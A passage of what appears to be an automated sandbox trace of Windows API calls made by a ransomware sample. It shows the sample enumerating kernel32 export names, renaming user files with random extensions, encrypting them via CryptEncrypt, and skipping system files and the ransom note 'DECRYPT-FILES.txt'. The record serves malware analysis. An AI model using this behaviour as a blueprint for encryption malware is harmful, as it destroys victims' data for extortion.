lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.979] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.979] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.979] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.979] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.979] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.979] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.979] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.979] lstrcpyA (in: lpString1=0x36fda9c, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.980] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.980] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 40 [0185.980] wsprintfW (in: param_1=0x36fe754, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.XX0LL") returned 46 [0185.980] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.XX0LL" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.xx0ll"), dwFlags=0x0) returned 1 [0185.980] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.981] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.981] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.981] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaf75c6c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x11c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini.eh5o5Jp", cAlternateFileName="NTUSER~1.EH5")) returned 1 [0185.981] lstrcmpiW (lpString1="ntuser.ini.eh5o5Jp", lpString2="DECRYPT-FILES.txt") returned 1 [0185.981] lstrcmpiW (lpString1="ntuser.ini.eh5o5Jp", lpString2="autorun.inf") returned 1 [0185.981] lstrcmpiW (lpString1="ntuser.ini.eh5o5Jp", lpString2="boot.ini") returned 1 [0185.981] lstrcmpiW (lpString1="ntuser.ini.eh5o5Jp", lpString2="desktop.ini") returned 1 [0185.981] lstrcmpiW (lpString1="ntuser.ini.eh5o5Jp", lpString2="ntuser.dat") returned 1 [0185.981] lstrcmpiW (lpString1="ntuser.ini.eh5o5Jp", lpString2="iconcache.db") returned 1 [0185.981] lstrcmpiW (lpString1="ntuser.ini.eh5o5Jp", lpString2="bootsect.bak") returned 1 [0185.981] lstrcmpiW (lpString1="ntuser.ini.eh5o5Jp", lpString2="ntuser.dat.log") returned 1 [0185.981] lstrcmpiW (lpString1="ntuser.ini.eh5o5Jp", lpString2="thumbs.db") returned -1 [0185.981] lstrcmpiW (lpString1="ntuser.ini.eh5o5Jp", lpString2="Bootfont.bin") returned 1 [0185.981] lstrlenW (lpString="ntuser.ini.eh5o5Jp") returned 18 [0185.982] lstrcmpiW (lpString1="eh5o5Jp", lpString2="lnk") returned -1 [0185.982] lstrcmpiW (lpString1="eh5o5Jp", lpString2="exe") returned -1 [0185.982] lstrcmpiW (lpString1="eh5o5Jp", lpString2="sys") returned -1 [0185.982] lstrcmpiW (lpString1="eh5o5Jp", lpString2="dll") returned 1 [0185.982] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0185.982] lstrlenW (lpString="ntuser.ini.eh5o5Jp") returned 18 [0185.982] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0185.982] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="ntuser.ini.eh5o5Jp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.eh5o5Jp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.eh5o5Jp" [0185.982] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.982] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.eh5o5Jp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.eh5o5jp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x254 [0185.982] GetFileSizeEx (in: hFile=0x254, lpFileSize=0x36fe720 | out: lpFileSize=0x36fe720*=284) returned 1 [0185.982] CreateFileMappingW (hFile=0x254, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x258 [0185.982] MapViewOfFile (hFileMappingObject=0x258, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.983] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.983] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.983] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.983] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe688*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe688*=0x100) returned 1 [0185.983] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.984] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.984] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.984] CloseHandle (hObject=0x258) returned 1 [0185.984] SetFilePointerEx (in: hFile=0x254, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.984] WriteFile (in: hFile=0x254, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe6a8, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe6a8*=0x108, lpOverlapped=0x0) returned 1 [0185.985] CloseHandle (hObject=0x0) returned 0 [0185.985] CloseHandle (hObject=0x254) returned 1 [0185.985] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.985] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.986] GetTickCount () returned 0x1135bb7 [0185.986] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.986] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.986] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.986] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.986] lstrlenA (lpString="kernel32.dll") returned 12 [0185.986] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.986] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.986] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.986] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.987] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.987] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.987] lstrlenA (lpString="ADDATOMA") returned 8 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.987] lstrlenA (lpString="ADDATOMW") returned 8 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.987] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.987] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.987] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.987] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.987] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.987] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.987] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.987] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.987] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.987] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.987] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.987] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.987] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.987] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.987] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.988] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.988] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.988] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.988] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.988] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.988] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.988] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.988] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.988] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.988] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.988] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.988] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.988] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.988] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.988] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.988] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.988] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.988] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.988] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.988] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.989] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.989] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.989] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.989] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.989] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.989] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.989] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.989] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.989] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.989] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.989] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.989] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.989] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.989] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.989] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.989] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.989] lstrlenA (lpString="BEEP") returned 4 [0185.989] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.989] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.990] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.990] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.990] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.990] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.990] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.990] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.990] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.990] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.990] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.990] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.990] lstrlenA (lpString="CANCELIO") returned 8 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.990] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.990] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.990] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.990] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.990] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.990] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.990] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.990] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.991] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.991] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.991] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.991] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.991] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.991] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.991] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.991] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.991] lstrlenA 